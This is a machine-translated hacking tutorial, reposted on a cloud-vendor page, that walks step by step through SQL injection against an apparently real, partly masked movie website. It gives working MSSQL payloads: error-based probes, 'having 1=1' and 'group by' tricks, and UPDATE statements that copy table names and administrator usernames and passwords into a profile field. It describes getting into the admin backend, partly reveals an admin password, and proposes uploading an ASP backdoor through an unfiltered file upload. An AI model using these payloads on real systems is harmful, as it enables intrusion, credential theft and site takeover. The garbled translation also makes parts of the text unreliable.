New techniques for SQL injection

Source: Internet
Author: User
Tags date count mssql sql ole sql injection table name valid
Tips for new techniques in SQL injection: Hacker base
Get the table name and field name
Applicable situation:
1) database is MSSQL
2 Connect the database is just ordinary users
3) Do not know the ASP source code

Attacks that can be made
1 The content of the data to add, view, change

Instance:
This document to
Http://www.dy***.com/user/wantpws.asp
Test the attack for the column.

First step:
Enter single quotes in the username to display
Microsoft OLE DB Provider for SQL Server error ' 80040e14 '
The string "" has an open quotation mark before it is closed.

/user/wantpws.asp, line 63

Description does not filter single quotes and the database is MSSQL.

Step Two:
Enter a '; Use master;--
Show
Microsoft OLE DB Provider for SQL Server error ' 80040e21 '
Multi-step OLE DB operation generated an error. If possible, check each OLE DB status value. No work is done.

/user/wantpws.asp, line 63
This means that there is no permission.

Step Three:
Enter: A ' or name like ' fff% ';--
Shows a user named FFFF.

Fourth Step:
Enter at user name
FFFF ' and 1<> (select count (email) from [user]);--
Show:
Microsoft OLE DB Provider for SQL Server error ' 80040e37 '
Object name ' user ' is invalid.

/user/wantpws.asp, line 96

Note that there is no user-named table, replace users to try the success, while indicating that there is a column called email.
(One way to drift clouds in the east is to enter a ' having 1=1--
The general return is as follows to get the table name and a field name directly
Microsoft OLE DB Provider for SQL Server error ' 80040e14 '
Column ' Users. ID ' is not valid in the select list because the column is not included in the aggregate function and there is no GROUP by clause.

/user/wantpws.asp, line 63


)

Now we know that the FFFF user's password is 111111.

The following statement gets all the table names and field names in the database.

Fifth Step:
Input:
FFFF '; Update [users] set email= (select top 1 name from sysobjects where xtype= ' u ' and status>0) where name= ' FFFF ';--
Description
The above statement is to get the first user table in the database and place the table name in the FFFF user's mailbox field.
By looking at FFFF's user profile, you can get the first one to use the table called AD
And then get the ID of this table based on the table name ad
FFFF '; Update [users] set email= (select top 1 id from sysobjects where xtype= ' u ' and name= ' ad ') where name= ' FFFF ';--
Ditto ID is: 581577110
Because the object flag ID is arranged according to the small to large, we can get the names of all the user tables.
You can get the name of the second table as follows.
FFFF '; Update [users] set email= (select top 1 name from sysobjects where xtype= ' u ' and id>581577110) where name= ' FFFF ' ;--

Ad 581577110
Users 597577167
Buy 613577224
Car 629577281
Learning 645577338
Log 661577395
Movie 677577452
Movieurl 693577509
Password 709577566
Type 725577623
Talk

After a period of speculation we get the above analysis should understand password,users is the most needed

Sixth step: Guess the fields of the important table
Input:
Now let's see what fields the Users table has
FFFF '; Update [users] set email= (select top 1 col_name (object_id (' users '), 3) from users where name= ' FFFF ';-
Get a third field is password
FFFF '; Update [users] set email= (select top 1 col_name (object_id (' users '), 4) from users where name= ' FFFF ';-
Get the fourth field is name
The Last Users table has a total of 28 fields.
(Note: Another way to get a field is if the system returns an error message
A ' GROUP by ID has 1=1--
Get
Microsoft OLE DB Provider for SQL Server error ' 80040e14 '
Column ' Users.userid ' is not valid in the select list because the column is neither included in the aggregate function nor included in the GROUP by clause.

/user/wantpws.asp, line 63
This second field is UserID.
Displays a third field.
A ' GROUP by Id,userid has 1=1--

Microsoft OLE DB Provider for SQL Server error ' 80040e14 '
Column ' Users.password ' is not valid in the select list because the column is neither included in the aggregate function nor included in the GROUP by clause.

/user/wantpws.asp, line 63
Get is password
In the same vein, it always shows all. :)
)

Users table
1 2 3 4
ID UserID Password Name

5 6 7 8 9 10 11 12 13 14 15-16
Province homeaddress City adress starlook sex e-mail nlook nos date money send

17 18 19 20 21 22 23 24 25 26 27-28
Oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag State Post


STARLOOK--12 2003 2:41pm
Nlook---0
NOS---2 landing times
DATE--12 2003 12:00AM Registration time?
money--ditto
send--Empty
oklook--0
dnlook--0
getmoney--0
state--0
note--, this guy is. Description

Password table
1 2 3
ID name pwd

Then I tried the ad to record the ad hit point.
Then try password The table to get the name and PWD fields.
Perform
FFFF '; Update [users] set email= (select top 1 name from password) where name= ' FFFF ';--
Can get the first username is admin123 look the same as most of the administrator.
And then got the password is dy***dick188 or play an asterisk to forget haha ...

So we are completely in the background of this movie site haha.
Http://www.dy***.com/login.asp

Further can also know that the administrator a total of three people password can also be seen.
FFFF '; Update [users] set email= (select top 1 count (IDs) from password) where name= ' FFFF ';--
FFFF '; Update [users] set email= (select top 1 pwd from password where id=2) where name= ' FFFF ';--

FFFF '; Update [users] set email= (select top 1 name from password where id=2) where name= ' FFFF ';--


It just doesn't seem to be enough to watch movies for free. I looked at its background management originally in
Add a movie where there is no filtering for uploaded pictures. asa file so I'll
Can upload an ASP backdoor and execute.




Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.